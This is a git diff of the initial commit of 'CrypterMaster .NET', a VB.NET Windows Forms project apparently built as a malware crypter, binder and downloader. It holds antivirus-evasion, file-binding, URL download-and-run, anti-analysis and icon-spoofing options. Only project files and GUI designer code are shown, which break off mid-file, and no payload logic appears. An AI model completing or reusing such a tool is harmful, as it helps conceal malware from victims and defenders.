initial commit
This commit is contained in:
@@ -0,0 +1,22 @@
|
||||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio 2013
|
||||
VisualStudioVersion = 12.0.30501.0
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "CrypterMaster", "CrypterMaster\CrypterMaster.vbproj", "{F2B037A7-F0C0-4875-B945-3A06DAB33E00}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Any CPU = Debug|Any CPU
|
||||
Release|Any CPU = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{F2B037A7-F0C0-4875-B945-3A06DAB33E00}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||
{F2B037A7-F0C0-4875-B945-3A06DAB33E00}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||
{F2B037A7-F0C0-4875-B945-3A06DAB33E00}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||
{F2B037A7-F0C0-4875-B945-3A06DAB33E00}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
EndGlobal
|
||||
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,6 @@
|
||||
<?xml version="1.0"?>
|
||||
<configuration>
|
||||
<startup>
|
||||
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5"/>
|
||||
</startup>
|
||||
</configuration>
|
||||
@@ -0,0 +1,173 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="12.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
|
||||
<PropertyGroup>
|
||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
||||
<ProjectGuid>{F2B037A7-F0C0-4875-B945-3A06DAB33E00}</ProjectGuid>
|
||||
<OutputType>WinExe</OutputType>
|
||||
<StartupObject>CrypterMaster.My.MyApplication</StartupObject>
|
||||
<RootNamespace>CrypterMaster</RootNamespace>
|
||||
<AssemblyName>CrypterMaster .NET</AssemblyName>
|
||||
<FileAlignment>512</FileAlignment>
|
||||
<MyType>WindowsForms</MyType>
|
||||
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
|
||||
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
|
||||
<IsWebBootstrapper>false</IsWebBootstrapper>
|
||||
<PublishUrl>publicar\</PublishUrl>
|
||||
<Install>true</Install>
|
||||
<InstallFrom>Disk</InstallFrom>
|
||||
<UpdateEnabled>false</UpdateEnabled>
|
||||
<UpdateMode>Foreground</UpdateMode>
|
||||
<UpdateInterval>7</UpdateInterval>
|
||||
<UpdateIntervalUnits>Days</UpdateIntervalUnits>
|
||||
<UpdatePeriodically>false</UpdatePeriodically>
|
||||
<UpdateRequired>false</UpdateRequired>
|
||||
<MapFileExtensions>true</MapFileExtensions>
|
||||
<ApplicationRevision>0</ApplicationRevision>
|
||||
<ApplicationVersion>1.0.0.%2a</ApplicationVersion>
|
||||
<UseApplicationTrust>false</UseApplicationTrust>
|
||||
<BootstrapperEnabled>true</BootstrapperEnabled>
|
||||
<TargetFrameworkProfile />
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugSymbols>true</DebugSymbols>
|
||||
<DebugType>full</DebugType>
|
||||
<DefineDebug>true</DefineDebug>
|
||||
<DefineTrace>true</DefineTrace>
|
||||
<OutputPath>bin\Debug\</OutputPath>
|
||||
<DocumentationFile>CrypterMaster .NET.xml</DocumentationFile>
|
||||
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugType>pdbonly</DebugType>
|
||||
<DefineDebug>false</DefineDebug>
|
||||
<DefineTrace>true</DefineTrace>
|
||||
<Optimize>true</Optimize>
|
||||
<OutputPath>bin\Release\</OutputPath>
|
||||
<DocumentationFile>CrypterMaster .NET.xml</DocumentationFile>
|
||||
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionExplicit>On</OptionExplicit>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionCompare>Binary</OptionCompare>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionStrict>Off</OptionStrict>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<OptionInfer>On</OptionInfer>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup>
|
||||
<ApplicationIcon>windows8.ico</ApplicationIcon>
|
||||
</PropertyGroup>
|
||||
<ItemGroup>
|
||||
<Reference Include="System" />
|
||||
<Reference Include="System.Data" />
|
||||
<Reference Include="System.Deployment" />
|
||||
<Reference Include="System.Drawing" />
|
||||
<Reference Include="System.Windows.Forms" />
|
||||
<Reference Include="System.Xml" />
|
||||
<Reference Include="System.Core" />
|
||||
<Reference Include="System.Xml.Linq" />
|
||||
<Reference Include="System.Data.DataSetExtensions" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Import Include="Microsoft.VisualBasic" />
|
||||
<Import Include="System" />
|
||||
<Import Include="System.Collections" />
|
||||
<Import Include="System.Collections.Generic" />
|
||||
<Import Include="System.Data" />
|
||||
<Import Include="System.Drawing" />
|
||||
<Import Include="System.Diagnostics" />
|
||||
<Import Include="System.Windows.Forms" />
|
||||
<Import Include="System.Linq" />
|
||||
<Import Include="System.Xml.Linq" />
|
||||
<Import Include="System.Threading.Tasks" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Compile Include="clsIconChanger.vb" />
|
||||
<Compile Include="GUI.vb">
|
||||
<SubType>Form</SubType>
|
||||
</Compile>
|
||||
<Compile Include="GUI.Designer.vb">
|
||||
<DependentUpon>GUI.vb</DependentUpon>
|
||||
<SubType>Form</SubType>
|
||||
</Compile>
|
||||
<Compile Include="mFunciones.vb" />
|
||||
<Compile Include="My Project\AssemblyInfo.vb" />
|
||||
<Compile Include="My Project\Application.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DependentUpon>Application.myapp</DependentUpon>
|
||||
</Compile>
|
||||
<Compile Include="My Project\Resources.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DesignTime>True</DesignTime>
|
||||
<DependentUpon>Resources.resx</DependentUpon>
|
||||
</Compile>
|
||||
<Compile Include="My Project\Settings.Designer.vb">
|
||||
<AutoGen>True</AutoGen>
|
||||
<DependentUpon>Settings.settings</DependentUpon>
|
||||
<DesignTimeSharedInput>True</DesignTimeSharedInput>
|
||||
</Compile>
|
||||
<Compile Include="Theme.vb">
|
||||
<SubType>Component</SubType>
|
||||
</Compile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<EmbeddedResource Include="GUI.resx">
|
||||
<DependentUpon>GUI.vb</DependentUpon>
|
||||
</EmbeddedResource>
|
||||
<EmbeddedResource Include="My Project\Resources.resx">
|
||||
<Generator>VbMyResourcesResXFileCodeGenerator</Generator>
|
||||
<LastGenOutput>Resources.Designer.vb</LastGenOutput>
|
||||
<CustomToolNamespace>My.Resources</CustomToolNamespace>
|
||||
<SubType>Designer</SubType>
|
||||
</EmbeddedResource>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="My Project\Application.myapp">
|
||||
<Generator>MyApplicationCodeGenerator</Generator>
|
||||
<LastGenOutput>Application.Designer.vb</LastGenOutput>
|
||||
</None>
|
||||
<None Include="My Project\Settings.settings">
|
||||
<Generator>SettingsSingleFileGenerator</Generator>
|
||||
<CustomToolNamespace>My</CustomToolNamespace>
|
||||
<LastGenOutput>Settings.Designer.vb</LastGenOutput>
|
||||
</None>
|
||||
<None Include="App.config" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<BootstrapperPackage Include=".NETFramework,Version=v4.5.1">
|
||||
<Visible>False</Visible>
|
||||
<ProductName>Microsoft .NET Framework 4.5.1 %28x86 y x64%29</ProductName>
|
||||
<Install>true</Install>
|
||||
</BootstrapperPackage>
|
||||
<BootstrapperPackage Include="Microsoft.Net.Client.3.5">
|
||||
<Visible>False</Visible>
|
||||
<ProductName>.NET Framework 3.5 SP1 Client Profile</ProductName>
|
||||
<Install>false</Install>
|
||||
</BootstrapperPackage>
|
||||
<BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
|
||||
<Visible>False</Visible>
|
||||
<ProductName>.NET Framework 3.5 SP1</ProductName>
|
||||
<Install>false</Install>
|
||||
</BootstrapperPackage>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<None Include="Resources\ResHacker.exe" />
|
||||
<Content Include="windows8.ico" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
|
||||
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
|
||||
Other similar extension points exist, see Microsoft.Common.targets.
|
||||
<Target Name="BeforeBuild">
|
||||
</Target>
|
||||
<Target Name="AfterBuild">
|
||||
</Target>
|
||||
-->
|
||||
</Project>
|
||||
@@ -0,0 +1,13 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup>
|
||||
<PublishUrlHistory>publicar\</PublishUrlHistory>
|
||||
<InstallUrlHistory />
|
||||
<SupportUrlHistory />
|
||||
<UpdateUrlHistory />
|
||||
<BootstrapperUrlHistory />
|
||||
<ErrorReportUrlHistory />
|
||||
<FallbackCulture>es-ES</FallbackCulture>
|
||||
<VerifyUploadedFiles>false</VerifyUploadedFiles>
|
||||
</PropertyGroup>
|
||||
</Project>
|
||||
@@ -0,0 +1,919 @@
|
||||
<Global.Microsoft.VisualBasic.CompilerServices.DesignerGenerated()> _
|
||||
Partial Class GUI
|
||||
Inherits System.Windows.Forms.Form
|
||||
|
||||
'Form reemplaza a Dispose para limpiar la lista de componentes.
|
||||
<System.Diagnostics.DebuggerNonUserCode()> _
|
||||
Protected Overrides Sub Dispose(ByVal disposing As Boolean)
|
||||
Try
|
||||
If disposing AndAlso components IsNot Nothing Then
|
||||
components.Dispose()
|
||||
End If
|
||||
Finally
|
||||
MyBase.Dispose(disposing)
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
'Requerido por el Diseñador de Windows Forms
|
||||
Private components As System.ComponentModel.IContainer
|
||||
|
||||
'NOTA: el Diseñador de Windows Forms necesita el siguiente procedimiento
|
||||
'Se puede modificar usando el Diseñador de Windows Forms.
|
||||
'No lo modifique con el editor de código.
|
||||
<System.Diagnostics.DebuggerStepThrough()> _
|
||||
Private Sub InitializeComponent()
|
||||
Dim resources As System.ComponentModel.ComponentResourceManager = New System.ComponentModel.ComponentResourceManager(GetType(GUI))
|
||||
Me.dialogCrypter = New System.Windows.Forms.OpenFileDialog()
|
||||
Me.dialogBinder = New System.Windows.Forms.OpenFileDialog()
|
||||
Me.dialogIcono = New System.Windows.Forms.OpenFileDialog()
|
||||
Me.dialogAssembly = New System.Windows.Forms.OpenFileDialog()
|
||||
Me.dialogCrear = New System.Windows.Forms.SaveFileDialog()
|
||||
Me.HuraGUI = New CrypterMaster.HuraForm()
|
||||
Me.btnCrear = New CrypterMaster.HuraButton()
|
||||
Me.progressCrear = New CrypterMaster.HuraProgressBar()
|
||||
Me.tabControl = New CrypterMaster.HuraTabControl()
|
||||
Me.TabCrypter = New System.Windows.Forms.TabPage()
|
||||
Me.HuraGroupBox1 = New CrypterMaster.HuraGroupBox()
|
||||
Me.rbtnUnknown_Crypter = New CrypterMaster.HuraRadioButton()
|
||||
Me.rbtnStairs_Crypter = New CrypterMaster.HuraRadioButton()
|
||||
Me.Label3 = New System.Windows.Forms.Label()
|
||||
Me.btnGenerar_Crypter = New CrypterMaster.HuraButton()
|
||||
Me.txtClave_Crypter = New CrypterMaster.HuraTextBox()
|
||||
Me.Label2 = New System.Windows.Forms.Label()
|
||||
Me.btnSeleccionar_Crypter = New CrypterMaster.HuraButton()
|
||||
Me.txtArchivo_Crypter = New CrypterMaster.HuraTextBox()
|
||||
Me.Label1 = New System.Windows.Forms.Label()
|
||||
Me.TabBinder = New System.Windows.Forms.TabPage()
|
||||
Me.comboDrop_Binder = New CrypterMaster.HuraComboBox()
|
||||
Me.HuraGroupBox3 = New CrypterMaster.HuraGroupBox()
|
||||
Me.chkEjecutar_Binder = New CrypterMaster.HuraCheckBox()
|
||||
Me.btnAgregar_Binder = New CrypterMaster.HuraButton()
|
||||
Me.btnQuitar_Binder = New CrypterMaster.HuraButton()
|
||||
Me.lstArchivos_Binder = New System.Windows.Forms.ListView()
|
||||
Me.colArchivo_Binder = CType(New System.Windows.Forms.ColumnHeader(), System.Windows.Forms.ColumnHeader)
|
||||
Me.colEjecutar_Binder = CType(New System.Windows.Forms.ColumnHeader(), System.Windows.Forms.ColumnHeader)
|
||||
Me.TabDownloader = New System.Windows.Forms.TabPage()
|
||||
Me.HuraGroupBox4 = New CrypterMaster.HuraGroupBox()
|
||||
Me.chkEjecutar_Downloader = New CrypterMaster.HuraCheckBox()
|
||||
Me.btnAgregar_Downloader = New CrypterMaster.HuraButton()
|
||||
Me.btnQuitar_Downloader = New CrypterMaster.HuraButton()
|
||||
Me.lstArchivos_Downloader = New System.Windows.Forms.ListView()
|
||||
Me.colURL_Downloader = CType(New System.Windows.Forms.ColumnHeader(), System.Windows.Forms.ColumnHeader)
|
||||
Me.colExtension_Downloader = CType(New System.Windows.Forms.ColumnHeader(), System.Windows.Forms.ColumnHeader)
|
||||
Me.colEjecutar_Downloader = CType(New System.Windows.Forms.ColumnHeader(), System.Windows.Forms.ColumnHeader)
|
||||
Me.comboDrop_Downloader = New CrypterMaster.HuraComboBox()
|
||||
Me.tabOpciones = New System.Windows.Forms.TabPage()
|
||||
Me.Label8 = New System.Windows.Forms.Label()
|
||||
Me.updwnRetraso = New System.Windows.Forms.NumericUpDown()
|
||||
Me.btnAssembly = New CrypterMaster.HuraButton()
|
||||
Me.btnIcono = New CrypterMaster.HuraButton()
|
||||
Me.chkRetraso = New CrypterMaster.HuraCheckBox()
|
||||
Me.txtAssembly = New CrypterMaster.HuraTextBox()
|
||||
Me.txtIcono = New CrypterMaster.HuraTextBox()
|
||||
Me.chkAssembly = New CrypterMaster.HuraCheckBox()
|
||||
Me.chkIcono = New CrypterMaster.HuraCheckBox()
|
||||
Me.chkAntis = New CrypterMaster.HuraCheckBox()
|
||||
Me.tabAcercaDe = New System.Windows.Forms.TabPage()
|
||||
Me.PictureBox2 = New System.Windows.Forms.PictureBox()
|
||||
Me.LinkLabel1 = New System.Windows.Forms.LinkLabel()
|
||||
Me.lblScan = New System.Windows.Forms.LinkLabel()
|
||||
Me.Label7 = New System.Windows.Forms.Label()
|
||||
Me.Label6 = New System.Windows.Forms.Label()
|
||||
Me.Label5 = New System.Windows.Forms.Label()
|
||||
Me.Label4 = New System.Windows.Forms.Label()
|
||||
Me.HuraGroupBox2 = New CrypterMaster.HuraGroupBox()
|
||||
Me.PictureBox1 = New System.Windows.Forms.PictureBox()
|
||||
Me.HuraControlBox1 = New CrypterMaster.HuraControlBox()
|
||||
Me.HuraGUI.SuspendLayout()
|
||||
Me.tabControl.SuspendLayout()
|
||||
Me.TabCrypter.SuspendLayout()
|
||||
Me.HuraGroupBox1.SuspendLayout()
|
||||
Me.TabBinder.SuspendLayout()
|
||||
Me.HuraGroupBox3.SuspendLayout()
|
||||
Me.TabDownloader.SuspendLayout()
|
||||
Me.HuraGroupBox4.SuspendLayout()
|
||||
Me.tabOpciones.SuspendLayout()
|
||||
CType(Me.updwnRetraso, System.ComponentModel.ISupportInitialize).BeginInit()
|
||||
Me.tabAcercaDe.SuspendLayout()
|
||||
CType(Me.PictureBox2, System.ComponentModel.ISupportInitialize).BeginInit()
|
||||
Me.HuraGroupBox2.SuspendLayout()
|
||||
CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).BeginInit()
|
||||
Me.SuspendLayout()
|
||||
'
|
||||
'HuraGUI
|
||||
'
|
||||
Me.HuraGUI.AccentColor = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.HuraGUI.BackColor = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.HuraGUI.ColorScheme = CrypterMaster.HuraForm.ColorSchemes.Dark
|
||||
Me.HuraGUI.Controls.Add(Me.btnCrear)
|
||||
Me.HuraGUI.Controls.Add(Me.progressCrear)
|
||||
Me.HuraGUI.Controls.Add(Me.tabControl)
|
||||
Me.HuraGUI.Controls.Add(Me.HuraControlBox1)
|
||||
Me.HuraGUI.Dock = System.Windows.Forms.DockStyle.Fill
|
||||
Me.HuraGUI.Font = New System.Drawing.Font("Segoe UI", 9.5!)
|
||||
Me.HuraGUI.ForeColor = System.Drawing.Color.Gray
|
||||
Me.HuraGUI.Location = New System.Drawing.Point(0, 0)
|
||||
Me.HuraGUI.Name = "HuraGUI"
|
||||
Me.HuraGUI.Size = New System.Drawing.Size(685, 231)
|
||||
Me.HuraGUI.TabIndex = 0
|
||||
Me.HuraGUI.Text = "CrypterMaster .NET"
|
||||
'
|
||||
'btnCrear
|
||||
'
|
||||
Me.btnCrear.BackColor = System.Drawing.Color.Transparent
|
||||
Me.btnCrear.BaseColour = System.Drawing.Color.White
|
||||
Me.btnCrear.BorderColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.btnCrear.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.btnCrear.HoverColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnCrear.Location = New System.Drawing.Point(543, 195)
|
||||
Me.btnCrear.Name = "btnCrear"
|
||||
Me.btnCrear.PressedColour = System.Drawing.Color.FromArgb(CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer))
|
||||
Me.btnCrear.ProgressColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(191, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnCrear.Size = New System.Drawing.Size(130, 26)
|
||||
Me.btnCrear.TabIndex = 5
|
||||
Me.btnCrear.Text = "Crear"
|
||||
'
|
||||
'progressCrear
|
||||
'
|
||||
Me.progressCrear.BaseColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.progressCrear.BorderColour = System.Drawing.Color.FromArgb(CType(CType(190, Byte), Integer), CType(CType(190, Byte), Integer), CType(CType(190, Byte), Integer))
|
||||
Me.progressCrear.FontColour = System.Drawing.Color.FromArgb(CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer))
|
||||
Me.progressCrear.Location = New System.Drawing.Point(12, 195)
|
||||
Me.progressCrear.Maximum = 100
|
||||
Me.progressCrear.Name = "progressCrear"
|
||||
Me.progressCrear.ProgressColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.progressCrear.SecondColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(250, Byte), Integer))
|
||||
Me.progressCrear.Size = New System.Drawing.Size(525, 26)
|
||||
Me.progressCrear.TabIndex = 4
|
||||
Me.progressCrear.Text = "HuraProgressBar1"
|
||||
Me.progressCrear.TwoColour = True
|
||||
Me.progressCrear.Value = 0
|
||||
'
|
||||
'tabControl
|
||||
'
|
||||
Me.tabControl.Controls.Add(Me.TabCrypter)
|
||||
Me.tabControl.Controls.Add(Me.TabBinder)
|
||||
Me.tabControl.Controls.Add(Me.TabDownloader)
|
||||
Me.tabControl.Controls.Add(Me.tabOpciones)
|
||||
Me.tabControl.Controls.Add(Me.tabAcercaDe)
|
||||
Me.tabControl.Font = New System.Drawing.Font("Segoe UI", 9.5!)
|
||||
Me.tabControl.ItemSize = New System.Drawing.Size(0, 30)
|
||||
Me.tabControl.Location = New System.Drawing.Point(12, 32)
|
||||
Me.tabControl.Name = "tabControl"
|
||||
Me.tabControl.SelectedIndex = 0
|
||||
Me.tabControl.Size = New System.Drawing.Size(662, 161)
|
||||
Me.tabControl.TabIndex = 3
|
||||
'
|
||||
'TabCrypter
|
||||
'
|
||||
Me.TabCrypter.BackColor = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.TabCrypter.Controls.Add(Me.HuraGroupBox1)
|
||||
Me.TabCrypter.Controls.Add(Me.btnGenerar_Crypter)
|
||||
Me.TabCrypter.Controls.Add(Me.txtClave_Crypter)
|
||||
Me.TabCrypter.Controls.Add(Me.Label2)
|
||||
Me.TabCrypter.Controls.Add(Me.btnSeleccionar_Crypter)
|
||||
Me.TabCrypter.Controls.Add(Me.txtArchivo_Crypter)
|
||||
Me.TabCrypter.Controls.Add(Me.Label1)
|
||||
Me.TabCrypter.Location = New System.Drawing.Point(4, 34)
|
||||
Me.TabCrypter.Name = "TabCrypter"
|
||||
Me.TabCrypter.Padding = New System.Windows.Forms.Padding(3)
|
||||
Me.TabCrypter.Size = New System.Drawing.Size(654, 123)
|
||||
Me.TabCrypter.TabIndex = 0
|
||||
Me.TabCrypter.Text = "Crypter"
|
||||
'
|
||||
'HuraGroupBox1
|
||||
'
|
||||
Me.HuraGroupBox1.BackColor = System.Drawing.Color.White
|
||||
Me.HuraGroupBox1.Controls.Add(Me.rbtnUnknown_Crypter)
|
||||
Me.HuraGroupBox1.Controls.Add(Me.rbtnStairs_Crypter)
|
||||
Me.HuraGroupBox1.Controls.Add(Me.Label3)
|
||||
Me.HuraGroupBox1.Location = New System.Drawing.Point(505, 23)
|
||||
Me.HuraGroupBox1.Name = "HuraGroupBox1"
|
||||
Me.HuraGroupBox1.Size = New System.Drawing.Size(143, 85)
|
||||
Me.HuraGroupBox1.TabIndex = 6
|
||||
Me.HuraGroupBox1.Text = "HuraGroupBox1"
|
||||
'
|
||||
'rbtnUnknown_Crypter
|
||||
'
|
||||
Me.rbtnUnknown_Crypter.BaseColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.rbtnUnknown_Crypter.BorderColour = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.rbtnUnknown_Crypter.Checked = False
|
||||
Me.rbtnUnknown_Crypter.CheckedColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.rbtnUnknown_Crypter.Cursor = System.Windows.Forms.Cursors.Hand
|
||||
Me.rbtnUnknown_Crypter.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.rbtnUnknown_Crypter.HighlightColour = System.Drawing.Color.FromArgb(CType(CType(240, Byte), Integer), CType(CType(240, Byte), Integer), CType(CType(240, Byte), Integer))
|
||||
Me.rbtnUnknown_Crypter.Location = New System.Drawing.Point(6, 56)
|
||||
Me.rbtnUnknown_Crypter.Name = "rbtnUnknown_Crypter"
|
||||
Me.rbtnUnknown_Crypter.Size = New System.Drawing.Size(127, 22)
|
||||
Me.rbtnUnknown_Crypter.TabIndex = 3
|
||||
Me.rbtnUnknown_Crypter.Text = "Unknown"
|
||||
'
|
||||
'rbtnStairs_Crypter
|
||||
'
|
||||
Me.rbtnStairs_Crypter.BaseColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.rbtnStairs_Crypter.BorderColour = System.Drawing.Color.FromArgb(CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer), CType(CType(180, Byte), Integer))
|
||||
Me.rbtnStairs_Crypter.Checked = True
|
||||
Me.rbtnStairs_Crypter.CheckedColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.rbtnStairs_Crypter.Cursor = System.Windows.Forms.Cursors.Hand
|
||||
Me.rbtnStairs_Crypter.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.rbtnStairs_Crypter.HighlightColour = System.Drawing.Color.FromArgb(CType(CType(240, Byte), Integer), CType(CType(240, Byte), Integer), CType(CType(240, Byte), Integer))
|
||||
Me.rbtnStairs_Crypter.Location = New System.Drawing.Point(6, 28)
|
||||
Me.rbtnStairs_Crypter.Name = "rbtnStairs_Crypter"
|
||||
Me.rbtnStairs_Crypter.Size = New System.Drawing.Size(127, 22)
|
||||
Me.rbtnStairs_Crypter.TabIndex = 2
|
||||
Me.rbtnStairs_Crypter.Text = "Stairs"
|
||||
'
|
||||
'Label3
|
||||
'
|
||||
Me.Label3.AutoSize = True
|
||||
Me.Label3.ForeColor = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.Label3.Location = New System.Drawing.Point(3, 4)
|
||||
Me.Label3.Name = "Label3"
|
||||
Me.Label3.Size = New System.Drawing.Size(130, 17)
|
||||
Me.Label3.TabIndex = 1
|
||||
Me.Label3.Text = "Algoritmo de cifrado"
|
||||
'
|
||||
'btnGenerar_Crypter
|
||||
'
|
||||
Me.btnGenerar_Crypter.BackColor = System.Drawing.Color.Transparent
|
||||
Me.btnGenerar_Crypter.BaseColour = System.Drawing.Color.White
|
||||
Me.btnGenerar_Crypter.BorderColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(170, Byte), Integer), CType(CType(220, Byte), Integer))
|
||||
Me.btnGenerar_Crypter.FontColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.btnGenerar_Crypter.HoverColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnGenerar_Crypter.Location = New System.Drawing.Point(428, 79)
|
||||
Me.btnGenerar_Crypter.Name = "btnGenerar_Crypter"
|
||||
Me.btnGenerar_Crypter.PressedColour = System.Drawing.Color.FromArgb(CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer), CType(CType(245, Byte), Integer))
|
||||
Me.btnGenerar_Crypter.ProgressColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(191, Byte), Integer), CType(CType(255, Byte), Integer))
|
||||
Me.btnGenerar_Crypter.Size = New System.Drawing.Size(71, 29)
|
||||
Me.btnGenerar_Crypter.TabIndex = 5
|
||||
Me.btnGenerar_Crypter.Text = "Generar"
|
||||
'
|
||||
'txtClave_Crypter
|
||||
'
|
||||
Me.txtClave_Crypter.BackColor = System.Drawing.Color.Transparent
|
||||
Me.txtClave_Crypter.BackgroundColour = System.Drawing.Color.White
|
||||
Me.txtClave_Crypter.BorderColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.txtClave_Crypter.Location = New System.Drawing.Point(6, 79)
|
||||
Me.txtClave_Crypter.MaxLength = 32767
|
||||
Me.txtClave_Crypter.Multiline = False
|
||||
Me.txtClave_Crypter.Name = "txtClave_Crypter"
|
||||
Me.txtClave_Crypter.ReadOnly = True
|
||||
Me.txtClave_Crypter.Size = New System.Drawing.Size(416, 29)
|
||||
Me.txtClave_Crypter.Style = CrypterMaster.HuraTextBox.Styles.Normal
|
||||
Me.txtClave_Crypter.TabIndex = 4
|
||||
Me.txtClave_Crypter.TextAlign = System.Windows.Forms.HorizontalAlignment.Left
|
||||
Me.txtClave_Crypter.TextColour = System.Drawing.Color.FromArgb(CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer), CType(CType(150, Byte), Integer))
|
||||
Me.txtClave_Crypter.UseSystemPasswordChar = False
|
||||
'
|
||||
'Label2
|
||||
'
|
||||
Me.Label2.AutoSize = True
|
||||
